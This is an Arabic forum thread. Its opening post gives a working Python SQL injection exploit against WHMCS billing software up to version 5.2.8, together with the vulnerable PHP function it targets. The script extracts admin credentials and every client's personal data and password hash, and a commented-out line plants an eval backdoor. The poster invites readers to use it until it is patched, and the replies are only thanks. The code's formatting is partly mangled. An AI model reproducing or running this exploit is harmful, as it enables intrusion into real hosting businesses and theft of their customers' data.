الوسوم:
حالة الموضوع:
مغلق
  1. ABOJANA IRAQY

    ABOJANA IRAQY DeveloPer Plus

    الأنتساب:
    ‏10 مايو 2013
    المشاركات:
    125
    الإعجابات المتلقاة:
    59
    نقاط الجائزة:
    28
    السلام عليكم

    الخطاء في هذا الملف

    كود PHP:
    /includes/dbfunctions.php:
    كود PHP:
     <?php
    function select_query($table$fields$where$orderby ''$orderbyorder ''$limit ''$innerjoin '') {
        global 
    $CONFIG;
        global 
    $query_count;
        global 
    $mysql_errors;
        global 
    $whmcsmysql;
        if (!
    $fields) {
        
    $fields '*';
        }
        
    $query 'SELECT ' $fields ' FROM ' db_make_safe_field($table);
        if (
    $innerjoin) {
        
    $query .= ' INNER JOIN ' db_escape_string($innerjoin);
        }
        if (
    $where) {
        if (
    is_array($where)) {
            
    $criteria = array();
            foreach (
    $where as $origkey => $value) {
            
    $key db_make_safe_field($origkey);
            if (
    is_array($value)) {
                if (
    $key == 'default') {
                
    $key '`default`';
                }
                if (
    $value['sqltype'] == 'LIKE') {
                
    $criteria[] = $key ' LIKE \'%' db_escape_string($value['value']) . '%\'';
                continue;
                }
                if (
    $value['sqltype'] == 'NEQ') {
                
    $criteria[] = $key '!=\'' db_escape_string($value['value']) . '\'';
                continue;
                }
                if (
    $value['sqltype'] == '>') {
                
    $criteria[] = $key '>' db_escape_string($value['value']);
                continue;
                }
                if (
    $value['sqltype'] == '<') {
                
    $criteria[] = $key '<' db_escape_string($value['value']);
                continue;
                }
                if (
    $value['sqltype'] == '<=') {
                
    $criteria[] = $origkey '<=' db_escape_string($value['value']);
                continue;
                }
                if (
    $value['sqltype'] == '>=') {
                
    $criteria[] = $origkey '>=' db_escape_string($value['value']);
                continue;
                }
                if (
    $value['sqltype'] == 'TABLEJOIN') {
                
    $criteria[] = $key '=' db_escape_string($value['value']);
                continue;
                }
                if (
    $value['sqltype'] == 'IN') {
                
    $criteria[] = $key ' IN (\'' implode('\',\''db_escape_array($value['values'])) . '\')';
                continue;
                }
                continue;
            }
    [...]
    ?> 
    كود PHP:
    like $key = array('sqltype' => 'TABLEJOIN''value' '[SQLI]');
    سكربت الاستغلال

    كود PHP:
    #!/usr/bin/env python
    # 2013/10/18 - WHMCS <=5.2.8 SQL Injection
    # http://localhost

    url 'http://client.target.com/' 

    import urllibresys
    from urllib2 import Request
    urlopen
    ua 
    "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

    def exploit(sql):
        
    sqlUnion '-1 union select 1,0,0,0,0,0,0,0,0,0,0,%s,0,0,0,0,0,0,0,0,0,0,0#' sql
        
    print "Doing stuff: %s" sqlUnion
        
    #you could exploit any file that does a select, I randomly chose viewticket.php
        
    urlopen(Request('%sviewticket.php' urldata="tid[sqltype]=TABLEJOIN&tid[value]=%s" sqlUnionheaders={"User-agent"ua})).read()
        return 
    re.search(r'<div class="clientmsg">(.*?)</div>'rre.DOTALL).group(1).strip()

    #get admins
    print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)')

    #get users
    count int(exploit('(SELECT COUNT(id) FROM tblclients)'))
    print 
    "User count %d" count
    for i in range(count):    
        print 
    exploit('(SELECT CONCAT(id,0x3a,firstname,0x3a,lastname,0x3a,address1,0x3a,address2,0x3a,city,0x3a,country,0x3a,ip,0x3a,email,0x3a,password) FROM tblclients LIMIT %d,1)' i)

    #are you evil? yes, you are!
    #php = "1';eval($_REQUEST['lol_whmcs']);#"
    #r = urlopen(Request('%sadmin/licenseerror.php?updatekey=true&whitelisted=1&newlicensekey=%s&match=1&username[sqltype]=TABLEJOIN&username[value]=-1||1=1%%23' % (url, urllib.quote_plus(php)), headers={"User-agent": ua})).read()
    بامكانك تلعب لحد ما يرقعونها ههههه فيه شخص ذكر انو الاولي ترقعت يالله هذي الثانيه &:"
     
  2. (أوسكار)

    (أوسكار) Developer

    الأنتساب:
    ‏5 نوفمبر 2012
    المشاركات:
    28
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: WHMCS <=5.2.8 SQL Injection

    مشكور يا غالي
     
  3. M3N X

    M3N X Developer

    الأنتساب:
    ‏16 يوليو 2013
    المشاركات:
    97
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    8
    رد: WHMCS <=5.2.8 SQL Injection

    بارك الله فيك​
    و جزاك الله كل خير​:{1}:
     
  4. katalooni

    katalooni Developer

    الأنتساب:
    ‏16 ديسمبر 2013
    المشاركات:
    52
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    RooT
    رد: WHMCS <=5.2.8 SQL Injection

    كفو تسلم عالثغرة
     
  5. THe Code

    THe Code Developer

    الأنتساب:
    ‏31 مارس 2012
    المشاركات:
    33
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    PHP
    رد: WHMCS <=5.2.8 SQL Injection

    مشكور وبارك الله بيك يا غالي احسنت &:":
     
  6. aL Musli

    aL Musli Developer

    الأنتساب:
    ‏21 يوليو 2012
    المشاركات:
    74
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الوظيفة:
    seo
    الإقامة:
    الموصل الحدباء
    رد: WHMCS <=5.2.8 SQL Injection

    مشكور ويعطيك العافيه اخوي..
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة